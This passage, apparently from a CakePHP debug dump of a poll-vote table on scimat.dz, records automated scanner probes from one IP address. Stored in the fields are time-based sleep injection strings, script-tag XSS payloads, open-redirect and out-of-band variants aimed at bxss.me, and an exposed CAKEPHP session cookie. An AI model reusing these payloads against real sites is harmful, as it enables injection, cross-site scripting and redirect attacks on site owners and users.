'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1240 => array(
'id' => '1783',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1241 => array(
'id' => '1784',
'ip' => 'xfs.bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1242 => array(
'id' => '1785',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1243 => array(
'id' => '1786',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1244 => array(
'id' => '1787',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1245 => array(
'id' => '1788',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1246 => array(
'id' => '1789',
'ip' => '45.84.137.43',
'ip1' => 'xfs.bxss.me',
'sondage_id' => '2'
),
(int) 1247 => array(
'id' => '1790',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1248 => array(
'id' => '1791',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1249 => array(
'id' => '1792',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1250 => array(
'id' => '1793',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1251 => array(
'id' => '1794',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1252 => array(
'id' => '1795',
'ip' => '45.84.137.43',
'ip1' => ''"()',
'sondage_id' => '2'
),
(int) 1253 => array(
'id' => '1796',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1254 => array(
'id' => '1797',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1255 => array(
'id' => '1798',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1256 => array(
'id' => '1799',
'ip' => '45.84.137.43',
'ip1' => '<pre class='&&sleep(27*1000)*qvumyn&&'',
'sondage_id' => '2'
),
(int) 1257 => array(
'id' => '1800',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1258 => array(
'id' => '1801',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1259 => array(
'id' => '1802',
'ip' => '45.84.137.43',
'ip1' => '<pre class="&&sleep(27*1000)*ajfzol&&"',
'sondage_id' => '2'
),
(int) 1260 => array(
'id' => '1803',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1261 => array(
'id' => '1804',
'ip' => 'https://scimat.dz/',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1262 => array(
'id' => '1805',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1263 => array(
'id' => '1806',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1264 => array(
'id' => '1807',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1265 => array(
'id' => '1808',
'ip' => '45.84.137.43',
'ip1' => '<pre class='||sleep(27*1000)*lfenla||'',
'sondage_id' => '2'
),
(int) 1266 => array(
'id' => '1809',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1267 => array(
'id' => '1810',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1268 => array(
'id' => '1811',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1269 => array(
'id' => '1812',
'ip' => '45.84.137.43',
'ip1' => '<pre class="||sleep(27*1000)*ehgvvd||"',
'sondage_id' => '2'
),
(int) 1270 => array(
'id' => '1813',
'ip' => 'https://scimat.dz/',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1271 => array(
'id' => '1814',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1272 => array(
'id' => '1815',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1273 => array(
'id' => '1816',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1274 => array(
'id' => '1817',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1275 => array(
'id' => '1818',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1276 => array(
'id' => '1819',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1277 => array(
'id' => '1820',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1278 => array(
'id' => '1821',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1279 => array(
'id' => '1822',
'ip' => 'https://bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1280 => array(
'id' => '1823',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1281 => array(
'id' => '1824',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1282 => array(
'id' => '1825',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1283 => array(
'id' => '1826',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1284 => array(
'id' => '1827',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1285 => array(
'id' => '1828',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1286 => array(
'id' => '1829',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1287 => array(
'id' => '1830',
'ip' => 'https://bxss.me/',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1288 => array(
'id' => '1831',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1289 => array(
'id' => '1832',
'ip' => 'https://bxss.me/\',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1290 => array(
'id' => '1833',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1291 => array(
'id' => '1834',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1292 => array(
'id' => '1835',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1293 => array(
'id' => '1836',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1294 => array(
'id' => '1837',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1295 => array(
'id' => '1838',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1296 => array(
'id' => '1839',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1297 => array(
'id' => '1840',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1298 => array(
'id' => '1841',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1299 => array(
'id' => '1842',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1300 => array(
'id' => '1843',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1301 => array(
'id' => '1844',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1302 => array(
'id' => '1845',
'ip' => ''"',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1303 => array(
'id' => '1846',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1304 => array(
'id' => '1847',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1305 => array(
'id' => '1848',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1306 => array(
'id' => '1849',
'ip' => '<!--',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1307 => array(
'id' => '1850',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1308 => array(
'id' => '1851',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1309 => array(
'id' => '1852',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1310 => array(
'id' => '1853',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1311 => array(
'id' => '1854',
'ip' => '45.84.137.43',
'ip1' => ''"',
'sondage_id' => '2'
),
(int) 1312 => array(
'id' => '1855',
'ip' => '45.84.137.43',
'ip1' => '<!--',
'sondage_id' => '2'
),
(int) 1313 => array(
'id' => '1856',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1314 => array(
'id' => '1857',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1315 => array(
'id' => '1858',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1316 => array(
'id' => '1859',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1317 => array(
'id' => '1860',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1318 => array(
'id' => '1861',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1319 => array(
'id' => '1862',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1320 => array(
'id' => '1863',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1321 => array(
'id' => '1864',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1322 => array(
'id' => '1865',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1323 => array(
'id' => '1866',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1324 => array(
'id' => '1867',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1325 => array(
'id' => '1868',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1326 => array(
'id' => '1869',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1327 => array(
'id' => '1870',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1328 => array(
'id' => '1871',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1329 => array(
'id' => '1872',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1330 => array(
'id' => '1873',
'ip' => 'bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1331 => array(
'id' => '1874',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1332 => array(
'id' => '1875',
'ip' => 'scimat.dz.bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1333 => array(
'id' => '1876',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1334 => array(
'id' => '1877',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1335 => array(
'id' => '1878',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1336 => array(
'id' => '1879',
'ip' => 'scimat.dz@bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1337 => array(
'id' => '1880',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1338 => array(
'id' => '1881',
'ip' => 'scimat.dz:80@bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1339 => array(
'id' => '1882',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1340 => array(
'id' => '1883',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1341 => array(
'id' => '1884',
'ip' => 'bxss.me\@scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1342 => array(
'id' => '1885',
'ip' => 'bxss.me#scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1343 => array(
'id' => '1886',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1344 => array(
'id' => '1887',
'ip' => 'bxss.me?scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1345 => array(
'id' => '1888',
'ip' => '//bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1346 => array(
'id' => '1889',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1347 => array(
'id' => '1890',
'ip' => '//scimat.dz.bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1348 => array(
'id' => '1891',
'ip' => '//scimat.dz@bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1349 => array(
'id' => '1892',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1350 => array(
'id' => '1893',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1351 => array(
'id' => '1894',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1352 => array(
'id' => '1895',
'ip' => '//bxss.me\@scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1353 => array(
'id' => '1896',
'ip' => '//bxss.me#scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1354 => array(
'id' => '1897',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1355 => array(
'id' => '1898',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1356 => array(
'id' => '1899',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1357 => array(
'id' => '1900',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1358 => array(
'id' => '1901',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1359 => array(
'id' => '1902',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1360 => array(
'id' => '1903',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1361 => array(
'id' => '1904',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1362 => array(
'id' => '1905',
'ip' => '//bxss.me?scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1363 => array(
'id' => '1906',
'ip' => 'http:bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1364 => array(
'id' => '1907',
'ip' => 'http:bxss.me/',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1365 => array(
'id' => '1908',
'ip' => 'http:bxss.me/\',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1366 => array(
'id' => '1909',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1367 => array(
'id' => '1910',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1368 => array(
'id' => '1911',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1369 => array(
'id' => '1912',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1370 => array(
'id' => '1913',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1371 => array(
'id' => '1914',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1372 => array(
'id' => '1915',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1373 => array(
'id' => '1916',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1374 => array(
'id' => '1917',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1375 => array(
'id' => '1918',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1376 => array(
'id' => '1919',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1377 => array(
'id' => '1920',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1378 => array(
'id' => '1921',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1379 => array(
'id' => '1922',
'ip' => 'https:\\bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1380 => array(
'id' => '1923',
'ip' => 'https:\\bxss.me/',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1381 => array(
'id' => '1924',
'ip' => 'https:\\bxss.me/\',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1382 => array(
'id' => '1925',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1383 => array(
'id' => '1926',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1384 => array(
'id' => '1927',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1385 => array(
'id' => '1928',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1386 => array(
'id' => '1929',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1387 => array(
'id' => '1930',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1388 => array(
'id' => '1931',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1389 => array(
'id' => '1932',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1390 => array(
'id' => '1933',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1391 => array(
'id' => '1934',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1392 => array(
'id' => '1935',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1393 => array(
'id' => '1936',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1394 => array(
'id' => '1937',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1395 => array(
'id' => '1938',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1396 => array(
'id' => '1939',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1397 => array(
'id' => '1940',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1398 => array(
'id' => '1941',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1399 => array(
'id' => '1942',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1400 => array(
'id' => '1943',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1401 => array(
'id' => '1944',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1402 => array(
'id' => '1945',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1403 => array(
'id' => '1946',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1404 => array(
'id' => '1947',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1405 => array(
'id' => '1948',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1406 => array(
'id' => '1949',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1407 => array(
'id' => '1950',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1408 => array(
'id' => '1951',
'ip' => '/\bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1409 => array(
'id' => '1952',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1410 => array(
'id' => '1953',
'ip' => '/\scimat.dz.bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1411 => array(
'id' => '1954',
'ip' => '/\scimat.dz@bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1412 => array(
'id' => '1955',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1413 => array(
'id' => '1956',
'ip' => '/\bxss.me\@scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1414 => array(
'id' => '1957',
'ip' => '/\bxss.me#scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1415 => array(
'id' => '1958',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1416 => array(
'id' => '1959',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1417 => array(
'id' => '1960',
'ip' => '/\bxss.me?scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1418 => array(
'id' => '1961',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1419 => array(
'id' => '1962',
'ip' => '/\/bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1420 => array(
'id' => '1963',
'ip' => '/\/scimat.dz.bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1421 => array(
'id' => '1964',
'ip' => '/\/scimat.dz@bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1422 => array(
'id' => '1965',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1423 => array(
'id' => '1966',
'ip' => '/\/bxss.me#scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1424 => array(
'id' => '1967',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1425 => array(
'id' => '1968',
'ip' => '/\/bxss.me?scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1426 => array(
'id' => '1969',
'ip' => '\\bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1427 => array(
'id' => '1970',
'ip' => '\\scimat.dz.bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1428 => array(
'id' => '1971',
'ip' => '\\scimat.dz@bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1429 => array(
'id' => '1972',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1430 => array(
'id' => '1973',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1431 => array(
'id' => '1974',
'ip' => '\\bxss.me\@scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1432 => array(
'id' => '1975',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1433 => array(
'id' => '1976',
'ip' => '\\bxss.me#scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1434 => array(
'id' => '1977',
'ip' => '\\bxss.me?scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1435 => array(
'id' => '1978',
'ip' => '45.84.137.43',
'ip1' => 'https://scimat.dz/',
'sondage_id' => '2'
),
(int) 1436 => array(
'id' => '1979',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1437 => array(
'id' => '1980',
'ip' => '45.84.137.43',
'ip1' => 'https://redirtest.acx/',
'sondage_id' => '2'
),
(int) 1438 => array(
'id' => '1981',
'ip' => '45.84.137.43',
'ip1' => 'scimat.dz',
'sondage_id' => '2'
),
(int) 1439 => array(
'id' => '1982',
'ip' => '45.84.137.43',
'ip1' => 'redirtest.acx',
'sondage_id' => '2'
),
(int) 1440 => array(
'id' => '1983',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1441 => array(
'id' => '1984',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1442 => array(
'id' => '1985',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1443 => array(
'id' => '1986',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1444 => array(
'id' => '1987',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1445 => array(
'id' => '1988',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1446 => array(
'id' => '1989',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1447 => array(
'id' => '1990',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1448 => array(
'id' => '1991',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1449 => array(
'id' => '1992',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1450 => array(
'id' => '1993',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1451 => array(
'id' => '1994',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1452 => array(
'id' => '1995',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1453 => array(
'id' => '1996',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1454 => array(
'id' => '1997',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1455 => array(
'id' => '1998',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1456 => array(
'id' => '1999',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1457 => array(
'id' => '2000',
'ip' => '45.84.137.439650591',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1458 => array(
'id' => '2001',
'ip' => '45.84.137.43',
'ip1' => '<pre class='"()&%<zzz><ScRiPt >FTi1(9982)</ScRiPt>',
'sondage_id' => '2'
),
(int) 1459 => array(
'id' => '2002',
'ip' => '45.84.137.43',
'ip1' => ''"()&%<zzz><ScRiPt >FTi1(9006)</ScRiPt>',
'sondage_id' => '2'
),
(int) 1460 => array(
'id' => '2003',
'ip' => '45.84.137.43',
'ip1' => '<pre class=9973721',
'sondage_id' => '2'
),
(int) 1461 => array(
'id' => '2004',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1462 => array(
'id' => '2005',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1463 => array(
'id' => '2006',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1464 => array(
'id' => '2007',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1465 => array(
'id' => '2008',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1466 => array(
'id' => '2009',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1467 => array(
'id' => '2010',
'ip' => '45.84.137.43',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 1468 => array(
'id' => '2011',
'ip' => '45.84.137.43',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 1469 => array(
'id' => '2012',
'ip' => 'B9hyk985',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 1470 => array(
'id' => '2013',
'ip' => '1zq1eOsX: PXdknzbm',
